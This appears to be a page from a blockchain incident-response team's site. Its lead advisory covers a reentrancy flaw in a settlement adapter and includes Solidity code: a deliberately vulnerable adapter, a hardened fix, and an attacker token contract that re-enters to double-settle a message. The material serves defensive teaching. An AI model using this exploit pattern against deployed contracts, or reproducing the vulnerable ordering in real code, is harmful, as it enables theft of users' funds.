Reentrancy via fallback in cross-chain settlement adapter
An unchecked external call in a widely deployed settlement adapter allows attacker-controlled tokens to re-enter and double-spend settlement messages. Patched in v2.4.7.
Computer Emergency Response Team · Web3
0xCERT is an independent computer emergency response team for public blockchains. We coordinate incident response, advisories, and stolen-fund recovery across smart contracts, bridges, wallets, and Web3 infrastructure — 24/7, across every chain that matters.
› on-call · Initial triage within 60 minutes, 24/7
Stolen in 2025: $2.1B+ across tracked exploits
Median response: < 60 min from report to triage
Chains covered: 40+ L1s, L2s, and app-chains
Coverage: 24/7/365 on-call rotation
Mission
Traditional CERTs were designed for IP networks, TLS certificates, and a small set of vendors. Blockchains have none of those assumptions. Code is the bank, the ledger is public, and the attacker keeps the funds the moment a transaction lands.
0xCERT exists because no one owns the incident. Protocols, bridges, wallets, validators, and exchanges all touch the blast radius of a single exploit, but none of them have the standing to coordinate the others. We do.
We are non-commercial, vendor-neutral, and chain-agnostic. We don't sell a product. We answer the phone, run the war room, publish the advisory, and feed the IOC list to everyone who needs it — for free.
Services
CVE-style advisories for smart contracts and Web3 infrastructure.
Curated indicators of compromise for the Web3 attack surface.
Coordinated takedown of malicious sites and front-end takeovers.
On-chain forensics to follow stolen assets across chains and mixers.
Tabletop exercises and IR training for protocol and infra teams.
Recent advisories
Reentrancy via fallback in cross-chain settlement adapter (summarized at the top of this page). Patched in v2.4.7.
Attackers replaced bundle.js to inject a wallet drainer for ~3.5 hours. Affected users were re-routed to a malicious Permit2 signer. IOCs published.
Coordinated phishing campaign using purchased ENS subdomains pointing to drainer kits. Domain list distributed to wallet vendors.
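The settlement-adapter advisory above describes a classic shape: an external call into a caller-supplied token lands before the message is marked settled, so the token's transfer hook can call back in and get the same message paid twice. The contracts below are an added illustration of that pattern, not the affected adapter's code or 0xCERT's; the contract and function names, the `settled` mapping, and the `payouts` counter (standing in for funds leaving a vault) are all assumptions. `VulnerableAdapter` shows the interaction-before-effect ordering with an unchecked return value, `HardenedAdapter` the fix (checks, effects, one checked interaction, behind a reentrancy lock), and `ReentrantToken` the attacker-controlled token that re-enters once from `transfer()`. A native-ETH recipient re-entering from `receive()`/`fallback()` is the same bug with a different hook.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Illustrative example only. Contract names, the settle() signature and the
// payouts counter are assumptions for this demo, not the real adapter's API.

interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
}

interface ISettlementAdapter {
    function settle(bytes32 msgId, address token, address to, uint256 amount) external;
}

/// Vulnerable shape: the external call into a caller-supplied token happens
/// before the message is marked settled, and its return value is ignored.
contract VulnerableAdapter is ISettlementAdapter {
    mapping(bytes32 => bool) public settled;
    event Settled(bytes32 indexed msgId, address token, address to, uint256 amount);

    function settle(bytes32 msgId, address token, address to, uint256 amount) external {
        require(!settled[msgId], "already settled");
        // Interaction before effect: a token whose transfer() calls back into
        // settle() with the same msgId passes the require above a second time.
        IERC20(token).transfer(to, amount);
        settled[msgId] = true;
        emit Settled(msgId, token, to, amount);
    }
}

/// Hardened shape: checks, then effects, then one checked interaction,
/// with a reentrancy lock as defense in depth.
contract HardenedAdapter is ISettlementAdapter {
    mapping(bytes32 => bool) public settled;
    uint256 private _entered = 1;
    event Settled(bytes32 indexed msgId, address token, address to, uint256 amount);

    modifier nonReentrant() {
        require(_entered == 1, "reentrant call");
        _entered = 2;
        _;
        _entered = 1;
    }

    function settle(bytes32 msgId, address token, address to, uint256 amount) external nonReentrant {
        require(!settled[msgId], "already settled");
        settled[msgId] = true;                                            // effect first
        require(IERC20(token).transfer(to, amount), "transfer failed");  // checked interaction last
        emit Settled(msgId, token, to, amount);
    }
}

/// Attacker-controlled token whose transfer() re-enters the adapter once.
/// `payouts` counts how many times the adapter paid out the same message.
contract ReentrantToken is IERC20 {
    ISettlementAdapter public immutable adapter;
    bytes32 public msgId;
    uint256 public payouts;

    constructor(ISettlementAdapter _adapter) {
        adapter = _adapter;
    }

    // Entry point: one legitimate-looking settlement of `id` using this token.
    function attack(bytes32 id) external {
        msgId = id;
        payouts = 0;
        adapter.settle(id, address(this), msg.sender, 1 ether);
    }

    function transfer(address to, uint256 amount) external override returns (bool) {
        payouts += 1;
        if (payouts == 1) {
            // Re-enter while settled[msgId] is still false on the vulnerable
            // adapter. On HardenedAdapter this call reverts ("reentrant call")
            // and the revert bubbles up, so attack() fails as a whole.
            adapter.settle(msgId, address(this), to, amount);
        }
        return true;
    }
}
```

Walking it through: with `ReentrantToken` pointed at a `VulnerableAdapter`, `attack(id)` ends with `payouts() == 2` and two `Settled` events for one `msgId`, because the inner `settle()` runs before the outer one writes `settled[id] = true`. Pointed at a `HardenedAdapter`, the inner call trips the lock (and would trip the `already settled` check even without it), the revert propagates through `transfer()`, and the whole `attack()` transaction reverts. When reviewing an adapter, look for any external call (token transfer, hook, callback, native send) that precedes the state write it is supposed to be guarded by, and for return values of `transfer`/`call` that are never checked.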
Active incident?
If funds are moving, a key is exposed, or a front-end is serving malicious code — open a report. Our on-call engineer is paged immediately.